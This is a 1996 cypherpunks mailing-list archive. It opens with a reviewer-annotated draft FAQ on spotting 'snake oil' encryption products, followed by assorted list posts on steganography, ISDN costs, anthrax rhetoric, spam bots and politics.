determining whether they're dealing with snake oil or the Real Thing.

For a variety of reasons, this document is general in scope and does not
mention specific products or algorithms as being "good" or "Snake Oil".

When evaluating any product, be sure to understand what your needs are. For
data security products, what do you need protected? Do you want an archiver
that [supports strong encryption? ]

-----------------------------
>>> Problem: what is "Strong Encryption" ???  From a user's point of view this term is too fuzzy. Try: "that will keep data secure from your kid sister?  
A rogue government?  For 5 minutes?  Etc. etc. "
-----------------------------



-----------------------------
[An E-mail client? Something that will
encrypt on-line communications? Do you want to encrypt an entire disk or
partition, or selectively some files? Do you need on-the-fly (automatic)
encryption and decryption, or are you willing to select when and which files you want encrypted? ]

>>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff, but is about the kind of application user requires.

How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? >>> see 
above.
-----------------------------


-----------------------------
[Different products will serve different needs, and it's rare that a product
will serve every need. (Sometimes a product won't be needed: it may be
better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end 
than to use a separate encrypted utility in some cases.)]

>>> I don't understand: "sometimes a product won't be needed?"  I think this paragraph could be left out.  After all, OS utility or 
Snoop-Dooper-Doggy-Doo-Ware product, ya still gotta know what you're doing, right? 
So you everthing in the FAQ still applies; or maybe I'm missing the point here.
-----------------------------


Some basics

The cryptography-faq (found at
ftp://rtfm.mit.edu/pub/usenet/cryptography-faq/) is a more general tutorial
of cryptography, and should also be consulted. In an effort to make this FAQ
more complete, some very basic topics are included below.

Conventional vs. Public Key Cryptography

-----------------------------
There are two basic types of cryptosystems: symmetric (also known as
"conventional," [sometimes also called] >>> or <<< "private key") and asymmetric (public key). 
Symmetric ciphers require both the sender and the recipient to have the same key. That key is [applied] 
>>> used by the cryptographic algorithm  <<<to encrypt the data >>> originated <<< by the sender, and again by the recipient to decrypt the data. Asymmetric ciphers are much more
flexible, from a key management perspective. Each user has a pair of keys: a public key and a private key. The public key is shared widely, 
given to
everyone, while the private key is kept secret. If Alice wishes to mail Bob
some secrets, she simply gets Bob's public key, encrypts her message with
it, and sends it off to Bob. When Bob gets the message, he uses is private
key to decrypt the message.

Asymmetric [cryptosystems] >>>algorithms<<< are much slower than [their symmetric counterparts.] 
>>> symmetric algorithms, and are almost exclusively used to encrypt short "session keys," which are then used to encrypt a message using the speedier symmetric algorithms.  
This use of public key cryptography is called "key exchange."
-----------------------------

-----------------------------
[Also, key sizes must be much larger.]
>>>I agree with one comment that discouraged comparing the 2 algo types.-----------------------------


See the cryptography FAQ for a more
detailed discussion of [the topic.] >>>these topics.<<<


Key Sizes

-----------------------------
Some ciphers, while currently secure against most attacks, are not
considered viable in the next few years because of relatively small keysizes 
and increasing processor speeds [(making a brute-force attacks feasible).]

>>> Again, I maintain that the audience for this stuff can't be relied upon to even know what that means.  Try: "which makes the cipher vulnerable to breaking 
by trying every possible key combination (called a brute-force attack)."  
 --- or something like that.
-----------------------------



The tables below should give some general guidelines for making intelligent
decisions about the key length you need. If the key is too short, 
the system will be easily broken, even if the cipher is a good one.

In [1] and [2], we're presented with some guidelines for deciding
appropriate key length. (It is important to note that this is based on the
ability to predict computing power 40, 65, and 100 years from now. Major
breakthroughs in computing power 30 years from now might render everything
on this chart kiddieplay.)

               Security Requirements for Different Information

              Type of Traffic                Lifetime   Minimum [Symmetric]
                                                             Key Length
 Tactical military information             minutes/hours     56-64 bits
 Product announcements, mergers, interest
 rates                                      days/weeks        64 bits
 Long-term business plans                      years          64 bits
 Trade secrets (e.g., recipe for
 Coca-Cola)                                   decades         112 bits
 H-bomb secrets                              >40 years        128 bits
 Identities of spies                         >50 years        128 bits
 Personal affairs                            >50 years        128 bits
 Diplomatic embarrassments                   >65 years   at least 128 bits
 U.S. Census data                            100 years   at least 128 bits

-----------------------------
>>> Where is the attribution for the table?-----------------------------

As mentioned earlier, asymmetric ciphers require significantly longer keys
to provide the same level of security as their symmetric cipher
counterparts. Here is a comparison table, again, from Applied Cryptography,
second edition.
                    Symmetric and Public-Key Lengths With
                  Similar Resistance to Brute-Force Attacks

                 Symmetric Key Length Public-key Key Length
                        56 bits             384 bits
                        64 bits             512 bits
                        80 bits             768 bits
                       112 bits             1792 bits
                       128 bits             2304 bits

-----------------------------
>>> BEWARE, Danger: comparing public/private key cryptosystems again.  I think if you really want to do so, then the comparison should really be explained.  
-----------------------------



Some Common Snake-Oil Warning Signs

The following are some of the "red flags" one should watch for when
examining an encryption product

   * Technobabble

     The vendor's description of the product may contain a lot of
     hard-to-follow use of technical terms to describe how the product
     works. If this appears to be confusing nonsense, it may very well be
     (even to someone familiar with the terminology). Technobabble is a good
     means of confusing a potential user and masking the fact that the
     vendor doesn't understand anything either.

     A sign of technobabble is a descrption which drops a lot of technical
     terms for how the system works without actually explaining how it
     works. Often specifically coined terms are used to describe the scheme
     which are not found in the literature.

   * New Type of Cryptography?

     Beware of any vendor who claims to have invented a "new type of
     cryptography" or a "revolutionary breakthrough". Truly "new
     break-throughs" are likely to show up in the >>> scientific <<< literature, 
     and [many in the field] >>> professionals won't <<< [are unlikely to] trust 
     them until after years of analysis, by
     which time they are not so new anymore.

     Avoid software which claims to use 'new paradigms' of computing such as
     cellular automata, neural nets, genetic algorithms, chaos theory, etc.
     Just because software uses to different method of computation doesn't
     make it more secure.  

-----------------------------
     >>> As a matter of fact, these techniques are the subject of ongoing
     cryptographic research and nobody has published successful results 
     based on their use yet.
-----------------------------

     Anything that claims to have invented a new [public key] cryptosystem
     without publishing the details or underlying mathematical principles is
     highly suspect. Modern cryptography, especially public key systems, is
     grounded in mathematical theory. The security is based on problems that are believed, 
     if not known to be hard to solve.

-----------------------------
>>> There are some other comments in cpunks on this last bit.  I defer.-----------------------------

     The strength of any encryption scheme is only proven by the test of
     time, >>> involving exhaustive analysis by cryptographers<<<. New crypto is like new pharmaceuticals, not new cars.

   * Proprietary Algorithms

     Avoid software which uses "proprietary" or "secret" algorithms.
     Security through obscurity is not considered a safe means of protecting your data. 
     If the vendor does not feel confident that the method used
     can withstand years of scrutiny by the [academic] >>> professional and academic cryptographic <<< community, then you
     should be wary of trusting it. (Note that a vendor who specializes in
     the cryptography may have a proprietary algorithm which they'll show to
     others if they sign a non-disclosure agreement. If the vendor is
     well-reputed in the field, this can be an exception.)

-----------------------------
>>> How can you tell a well-reputed vendor?  I am thinging of one co. that promises to release their algo. details upon NDA, 
but at least in my case the details never showed up!  
This is slippery here!
-----------------------------

     Beware of specially modified versions of well-known algorithms. This
     may intentionally or unintentionally weaken the cipher.

     The use of a trusted algorithm, >>> availability of <<< [if not with] technical notes explaining
     the implementation ([if not availability of] >>> and preferably <<< the source code for the
     product) are a sign of good faith on the part of the vendor that you
     can take apart and test the implementation yourself.

     A common excuse for not disclosing how a program works is that "hackers
     might try to crack the program's security." While this may be a valid
     concern, it should be noted that such 'hackers' can reverse engineer
     the program to see how it works anyway. If the program is implemented
     properly and the algorithm is secure, this is not a problem. (If a
     hypothetical 'hacker' was able to get access you your system, access to
     encrypted data might be the least of your problems.)

-----------------------------
>>> Add: The strength of a cryptosystem should depend ONLY on the security of the keys involved, and not the security of the algorithm.
-----------------------------

   * Experienced Security Experts and Rave Reviews

     Beware of any product claiming that "experienced security experts" have
     analyzed it, but it won't say who (especially if the scheme has not
     been published in a reputable journal).

     Don't rely on reviews in newspapers, magazines or television shows,
     since they generally don't have cryptologists (celebrity hackers who
     know about telephone systems don't count) take the software apart for
     them.

     Just because the vendor is a well known company or the algorithm is
     patented doesn't make it secure either.

   * Unbreakability

     Some vendors will claim their software is "unbreakable". This is
     marketing hype, and a common sign of snake-oil. Avoid any vendor that
     makes unrealistic claims.
-----------------------------
>>> The reader is not qualified to evaluate realistic/unrealistic.-----------------------------

     No algorithm is unbreakable. Even the best algorithms are breakable
     using "brute force" (trying every possible key), but if the key size is
     large enough, this is impractical even with vast amounts of computing
     power.

     One-time pads are unbreakable, but they must be implemented perfectly,
     which is, at best, very difficult. See the next section for a more
     detailed discussion.

-----------------------------
>>> Add: Avoid products that use huge numbers to impress you that it would take massive amounts of time to break them.  This is ONLY true under the 
assumption that the only way to break the system is by exhaustively trying 
every possible key, and this assumption hass to be proved before the claim is valid.  
A cryptosystem using a keylength of 50,000 bits theoretically would take 
2 raised to the 50,000th power to break (a ridiculously large number) if, 
AND ONLY IF the algorithm had no weaknesses.  The hard part of cryptosystem 
design is making an algorithm with no weaknesses, such that exhaustive brute-force 
search is the only method of breaking it, not using long keys.
-----------------------------

   * One-Time-Pads

     A vendor might claim the system uses a one-time-pad (OTP), which is
     theoretically unbreakable. That is, snake-oil sellers will try to
     capitalize on the known strength of a OTP. It is important to
     understand that any variation in the implementation means that it is
     not an OTP, and has nowhere near the security of an OTP.

     A OTP system is not an algorithm. It works by having a "pad" of random
     bits in the possession of both the sender and recipient. 

-----------------------------
>>> Explain what you mean by a "pad" --- using a term which to the newbie may not usually be associated with crypto.  Origin being the pads of paper that they used to use etc.etc. ???
-----------------------------



-----------------------------
     The message is
     encrypted using [the next n bits in the pad as they key, where n is the
     number of bits in the message]

>>> as many bits from the key as there are bits in the message.  That is, for each bit in the message, there is a random bit from the one-time-pad.<<<
-----------------------------



After the bits are used from the pad,
     they're destroyed, and can never again be used. The bits in the pad
     must be truly random, generated using a real random source, such as
     specialized hardware, radioactive decay timings, etc., and not from an
     algorithm or cipher. Anything else is not a one-time-pad.

     The vendor may confuse random session keys or initialization vectors
     with OTPs.

   * Algorithm or product XXX is insecure

     Be wary of anything that makes claims that particular algorithms or
     other products are insecure without backing up those claims (or at
     least citing references to them).

     Sometimes attacks are theoretical or impractical (requiring special
     circumstances or massive computing power running for many years), and
     it's easy to confuse a layman by mentioning these.

   * Keys and Passwords

     The "key" and the "password" are often not the same thing. The "key"
     generally refers to the actual data used by the cipher, while the
     "password" refers to the word or phrase the user types in, which the
     software converts into the key (usually through a process called
     "hashing" or "key initialization").
>>> Other comments addressed this paragraph.  I defer.

     The reason this is done is because the characters a user is likely to
     type in do not cover the full range of possible characters. (Such keys
     would be more redundant and easier for an attacker to guess.) By
     hashing a key can be made from an arbitrary password that covers the
     full range of possible keys. It also allows one to use longer words, or
     phrases and whole sentences as a "passphrase", which is more secure.

     Anything that restricts users' passwords to something like 10 or 16 or
     even 32 characters is foolish. If the actual "password" is the cipher's
     key (rather than hashing it into a key, as explained above), avoid it.

     If the vendor confuses the distinctions between bits, bytes and
     characters when discussing the key, avoid this product.

     Convenience is nice, but be wary of anything that sounds too easy to
     use. 
-----------------------------
>>> Instead, try: be wary of any product that overly emphasizes ease-of-use without due attention to its cryptographic strength.
-----------------------------


Avoid anything that lets anyone with your copy of the software to
     access files, data, etc. without having to use some sort of key or
     passphrase.

     Avoid anything that doesn't let you generate your own keys (ie, the
     vendor sends you a key in the mail, or it's embedded in the copy of the
     software you buy).

     Avoid anything by a vendor who does not seem to understand the
     difference between public-key (asymmetric) cryptography and private-key
     (symmetric) cryptography.

   * Lost keys and passwords

     If there's a third-party utility that can crack the software, avoid it.
>>> Which - the utility or the crypto?

     If the vendor claims it can recover lost passwords (without using a
     key-backup or escrow feature), avoid it.

     If there is a key-backup or escrow feature, are you in control of the
     backup, or does the vendor or someone else hold a copy of the key?

   * Exportable from the USA

     If the software is made in North America, can it be exported? If the
     answer is yes, chances are it's not very strong. Strong cryptography is
     considered munitions in terms of export from the United States, and
     requires approval from the State Department. Chances are if the
     software is exportable, the algorithm is weak or it is crackable (hence
     it was approved for export).

     If the vendor is unaware of export restrictions, avoid the software:
     the vendor is not familiar with the state of the art.

     Because of export restrictions, some legitimate (not-Snake Oil)
     products may have a freely exportable version for outside of the USA,
     which is different from a separate US/Canada-only distribution. Also
     note that just because software has made it outside of North America
     does not mean that it is exportable: sometimes a utility will be
     illegally exported and posted on an overseas site.

Other Considerations

Interface isn't everything: user-friendliness is an important factor, but if
the product isn't secure then you're better off with something that is
secure (if not as easy to use).

No product is secure if it's not used properly. You can be the weakest link
in the chain if you use a product carelessly. Do not trust any product to be
foolproof, and be wary any product that claims it is.

Contributors

The following folks have contributed to this FAQ.

Jeremey Barrett <jeremey@forequest.com>

-----------------------------
>>> OK, you can use my RealName:Gregg Weissman <geeman@best.com>
<<<
-----------------------------



Jim Ray <liberty@gate.net>
Robert Rothenburg Walking-Owl <wlkngowl@unix.asb.com>

References

  1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons,
     1996
  2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E.
     Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to
     Provide Adequate Commercial Security," available via
     ftp://ftp.research.att.com/dist/mab/keylength.ps

----------------------------------------------------------------------------
C Matthew Curtin
Last modified: Mon Sep 16 09:51:41 EDT
----------------------------------------------------------------------

--
C Matthew Curtin                MEGASOFT, INC                Chief Scientist
I speak only for myself.  Don't whine to anyone but me about anything I say.
Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet
cmcurtin@research.megasoft.com http://research.megasoft.com/people/cmcurtin/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 18 Sep 1996 01:23:15 +0800
To: hallam@ai.mit.edu
Subject: Re: Spam blacklist project
In-Reply-To: <9609170603.AA03193@etna.ai.mit.edu>
Message-ID: <199609171356.JAA27539@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@ai.mit.edu writes:
> Well if some people find it amazing that there are people out there
> who agree with the 98.8% of people who did not vote Libertarian at the
> last election then so be it.

Most people in this country also think that Cheez Whiz is food, Philllll.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 05:29:38 +0800
To: "tcmay@got.net>
Subject: Re: 10 minute delay considered inconsequential
Message-ID: <19960917171059750.AAA156@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 11 Sep 1996 22:50:22 -0700, Timothy C. May wrote:

>>I've always wondered if the makers of mailer software couldn't include a delay
>>option, so that, say, a message might be held for 10 minutes and then sent.
>>Imagine how many of the "Sorry about x; I meant y" posts we'd never see.
>
>I expect there would be little effect. I suspect most of us write articles,
>send them out, and only notice the mistakes, typos, whatever when they are
>pointed out.

True.  I guess what we need is an AI mailer that would do something like
"Message #324 is rather confusing - did you really mean x?".  Oh well. . .

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 18 Sep 1996 05:31:08 +0800
To: cypherpunks@toad.com
Subject: Child pornography -- Expert witness for Federal jury trial
Message-ID: <Pine.GSO.3.95.960917100351.9842A-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Folks,

I just got a call from two Federal Public Defenders whose client is
charged with possession of child pornography stored in the /tmp
directory of a Unix system, in a zip'd file. (These lawyers seem to be
reasonably cyber-savvy, and told me they're following what I've been
writing about cyber-liberties.)

There's evidence saying that other people were using the account at
that time, and the attorneys have the relevant wtmp/utmp files.
There's also no evidence saying an actual child was exploited -- given
the nature of the images, they may have been morphed. I don't think
the defendant is accused of *making* them; he's only accused of
*possessing* them.

The case goes to jury trial soon in a Federal District Court.

If anyone is interested in testifying as an expert witness in this
case about Unix tech foo (and is qualified to do so), please let me
know and I'll pass along your info. I believe at least your expenses
would be paid.

Here's an opportunity to ensure justice is done and not just rant in
cyberspace... :)

-Declan

(Note I have no idea if the guy is indeed guilty of possessing JPGs
the government has banned. What I do know is that any defendant
deserves a fair trial and the government must prove that he's guilty
of the crimes for which he's charged. And if anyone does molest a
child, I say lock 'em up for a good long time.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:28:27 +0800
To: "Bill Frantz" <declan@well.com>
Subject: Re: Fear of Flying -- from HotWired
Message-ID: <19960917173431968.AAA223@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:

>>... former CIA director James Woolsey: responded with some seemingly 
>>   gratuitous anti-Net
>>   rhetoric. Terrorists may use biological weapons like anthrax, he said.
>>   "Anthrax is colorless, odorless, and has a 90 percent lethality. One
>>   gram has 100 million lethal doses." Then Woolsey delivered the zinger:
>>   "The knowledge of how to make anthrax is widely available, including
>>   on the Internet."

>Gee, biotech has come a long way.  Now I can download the Anthrax DNA
>sequence from the net and insert it in some carrier bacteria and start
>making Anthrax bacteria.  Neat!

Now the bad news:  the DNA replicator only works under Windows 95 and comes
with buggy drivers!

>Or did he mean I can chemically synthesize Anthrax toxin?  Or did he mean I
>can get information on culturing bacteria on the net, but must obtain a
>sample of the bacteria from other sources?
<sarcasm>
I guess we need to ban all those "science" pages; after all, why would any
non-terrorist want to learn about bacteria? 
</sarcasm>
>BTW - My dictionary says that Anthrax is primarily an animal disease which
>only occasionally infects humans.  It sounds like a poor choice for bio-war
>terror.

Unfortunately, it can be very deadly.  The idea here is that it rarely infects
humans - in the normal course of events.  If a determined biowarrior is trying
to infect people, all bets are off.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 05:51:27 +0800
To: "robert@precipice.v-site.net>
Subject: Re: common sense
Message-ID: <19960917173913750.AAA74@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 1996 16:04:14 -0700, HipCrime wrote:

>> And rather than "dispensing drugs in clinics," why not simply
>> scrap the drug laws entirely?  People have a *right* to do as
>> they please with their bodies.

>Let's hear it for common sense.  It's the first decent posting I've
>seen to this list.

Tell me, how do you walk with that huge chip on your shoulder?

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Wed, 18 Sep 1996 06:33:56 +0800
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: 56 kbps modems
In-Reply-To: <199609170721.AAA22844@dfw-ix12.ix.netcom.com>
Message-ID: <199609171741.KAA19827@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart writes:
> 
> >On Mon, 16 Sep 1996, Jay Gairson wrote:
> >> Speaking of ISDN, how many people, can afford to have a personal ISDN 
> >> line in there house?  And then afford to connect to something/someone 
> >> else on a next to permanent basis monthly?
> 
> It's Phone Company Dependent.  Here in Pac Bell territory,
> an ISDN phone line costs about 2.5 analog phone lines,
> and gets you two phone lines plus some signalling.
> Connection costs are free at night, and 1 cent/minute daytime.
> That may change - the phone company is appalled that all these
> computer people interpret the phrase "free at night" as meaning
> "it's _free_ at night", so their holding time predictions were bogus :-)
> Night is defined as 7pm-7am for ISDN.  ISDN-equipped ISPs start at
> about $30/month; don't know if that's unlimited connect time or not.

It's not.  We wanted a 24/7 connection, with ISDN in
PacBellLand that's ~$120/month for the ISDN (Centrex) and
about $300/month for an ISP to route packets.
Regular ISDN (not Centrex) would be even more expensive, and
to do Centrex your ISP has to be in the same CO.  The one ISP
that was in out CO seemed pretty clueless.  Pac Bell
doesn't seem to want us to use ISDN.  We wound up doing
Frame Relay instead.  We pay about the same to
PacBell but less to the ISP.  In addition, since it's
a Business Service, Pac Bell is pretty serious about
fixing it when it breaks- none of this "we'll check it out
in a day or two" like with POTS, they put a tech on
it right away.

As far as affording it goes, since our offices are at "home"
it's just another cost of doing business.

Crypto/security related: how hard is it to hack a Frame Relay
connection?  My impression is that it requires access to
one of the telco's routing computers, which would make it
about equivalent in difficulty to hacking POTS.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:11:45 +0800
To: "Jim_Miller@bilbo.suite.com>
Subject: Re: really undetectable crypto
Message-ID: <19960917174627828.AAA205@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 12 Sep 96 19:26:56 -0700, Jim Miller wrote:


>Most everybody on the list is familiar with the technique of hiding  
>encrypted messages in the LSBs of image files.  Personally, I would not  
>use such a technique because don't I believe it's really undetectable.  I  
>assume, without proof, that the LSBs of images files have statistical  
>properties that are sufficiently different from encrypted data that a  
>clever person could determine whether or not an image file contained an  
>imbedded encrypted message.

Actually, if you use only a few bits - and not, say, bit 15 of *every* pixel -
you can feel secure *IF* you are writing truly encrypted data.  A regular PGP
message has a bunch of header material that most certainly is not
random-looking.  OTOH, if you only write the raw data, then there is no way to
differentiate from the random noise added by any scanner - in most cases, the
last couple bits in each RGB triplet of a truecolor image are random.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:48:22 +0800
To: "Greg Broiles" <zachb@netcom.com>
Subject: Re: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <19960917180459734.AAA72@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996 07:47:27 -0700 (PDT), Z.B. wrote:

>> At 09:24 PM 9/12/96 -0700, zachb@netcom.com wrote:
>> >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
>> >> of material considered "harmful to minors" from vending machines.) 
>> >
>> >Even if this statute is meant only to apply to cigarette machines, which 
>> >would seem to be the case given all of the anti-cig stuff going on now,
>> >what good will it do?
>> 
>> Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit
>> upheld a CA statute forbidding sales of *printed* material considered
>> 'harmful to minors' from unsupervised vending machines". The publication(s)

>It's still mostly the same thing.  I've never seen the type of machine 
>that you're talking about, and I don't think anyone would be dumb enough 
>to install one in a store that is near a school, or frequented my 
>minors.  This law just does not seem like a very good idea.

Where did you live?  I used to walk home from school (in Ventura, CA - about 1
hour away from LA) and see a vending machine selling copies of "LA X-Press" (Or
something like that) right next to the vending machines for the Star-Free Press
and the LA Times.  This was on the curb by a busy shopping center, on the block
opposite of the County of Ventura's government center. Hypothetically, it was
even plausibly deniable (the watchword of the Clintons) - "I was just buying
this copy of the newspaper." And before someone asks, no, I wasn't buying them.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Z.B." <zachb@netcom.com>
Date: Wed, 18 Sep 1996 05:50:46 +0800
To: paul@fatmans.demon.co.uk
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <842976189.23679.0@fatmans.demon.co.uk>
Message-ID: <Pine.3.89.9609171157.A9883-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 16 Sep 1996 paul@fatmans.demon.co.uk wrote:

> 
>  
> The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ 
> along the following lines:
> 
> Q> What do it do when I join the list?
>  A> Killfile *@bwalk.dm.net
>
How about we go just a little farther than that and set up Procmail to 
bounce all of his messages back to him?  I'd hate to see his inbox if 
enough of us started doing that! <evil grin> 


> 
>   Datacomms Technologies web authoring and data security
>      Paul Bradley, Paul@fatmans.demon.co.uk
>        Http://www.fatmans.demon.co.uk/crypt/
>          "Don`t forget to mount a scratch monkey"
> 

---

Zach Babayco

zachb@netcom.com  <----- finger for PGP public key
http://www.geocities.com/SiliconValley/Park/4127






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 18 Sep 1996 05:08:42 +0800
To: HipCrime <robert@precipice.V-site.net>
Subject: Re: did you go to school?
In-Reply-To: <32399315.19E7@precipice.v-site.net>
Message-ID: <Pine.LNX.3.93.960917110607.1459B-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, HipCrime wrote:

> >>               THIN SLICES CUT FROM OUR PRECIOUS FORESTS.
> > "OUR?" Since when did my trees become partially yours?
> > JMR
> JMR, it's hard to believe that your English education is SO LACKING,
> that you missed the fact, that in my sentence quoted above, the word 
> "ours" refers to MANKIND IN GENERAL, not me personally.
> Go sit in the corner with the duncecap on, and don't come out until you
> can read an 8th grade piece of literature (with full comprehension).

     It's no wonder you're homeless.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 18 Sep 1996 08:20:50 +0800
To: cypherpunks@toad.com
Subject: Electronic cash, not letter boxes, stupid (darkside) hackers
Message-ID: <Pine.GSO.3.95.960917110617.9842D-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



9/16/96

         HAMBURG, Germany (Reuter) - A German student who used the
Internet for long-distance theft of computer data from a U.S.
company was arrested and charged with extortion for demanding
ransom for the return of the data, police said Monday.
         The student, from the city of Muenster in northern Germany,
sent the ransom letter through electronic mail (e-mail),
demanding that the firm pay $30,000 to a letter box in a Hamburg
post office.
         Police declined to identify the company.
         A police spokesman said the student and two accomplices had
illegally logged into its computers and stolen the data.
         Police said they were waiting at the letter box and detained
a 19-year-old, who later led them to the 26-year-old ringleader.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:26:13 +0800
To: "declan@eff.org>
Subject: Re: (fwd) Email Robot draws fire from CypherPunkz
Message-ID: <19960917180810718.AAA222@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996 09:02:19 -0700 (PDT), Declan McCullagh wrote:

>The Cypherpunks gang has apparently attacked a San Francisco artist's
	         ^^^^

No wonder the Feds want to close us down.  Look at all the dangerous things
we've done this week:  
	1. Shot the bull
	2. (see #1)
	3. (see #1)

et cetra	

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:36:53 +0800
To: "Robert Hettinga" <stewarts@ix.netcom.com>
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <19960917181556953.AAA214@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996 11:33:09 -0700, stewarts@ix.netcom.com wrote:

>Anybody for an Internet Driver's License?

*Surfer's* license.  The newsies love to refer to "net surfing", because to the
highly unknowledgable reader it makes it sound as if they have a clue about
what they're writing on.

# Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
# cadams@acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on
a computer in any case when the whole system is a game.  Word processing,
spreadsheets, telecoms -- it's all a game.  And they pay you to play it."
	-- Duncan Frissell






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 18 Sep 1996 03:36:53 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Politica...
Message-ID: <9608178429.AA842985398@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Subject: RE: Risk v. Charity (was: RE: Workers Paradise. /Political rant)

Black Unicorn <unicorn@schloss.li>
>On Mon, 16 Sep 1996 jbugden@smtplink.alis.ca wrote:
>> Specifically, that anyone can "save for a rainy day" and still not be
>> able to provide for events that can always happen: Heart attack,
>> stroke, car accident, pinched nerve that leaves you in excruciating
>> pain and unable to work for several years.
>
>Understand what it is you are saying.
>
>You are saying that everyone on the planet has a right to health
> insurance and disability insurance whether they can afford it or not.
> This is folly.  The result is serious moral hazard problems.

Almost, but not quite. I'm saying that within our two countries at least
(Canada, U.S.) everyone could have access to medically necessary procedures
because the *society as a whole* can afford it.

I understand moral hazard and risk pool seperation. I also understand that the
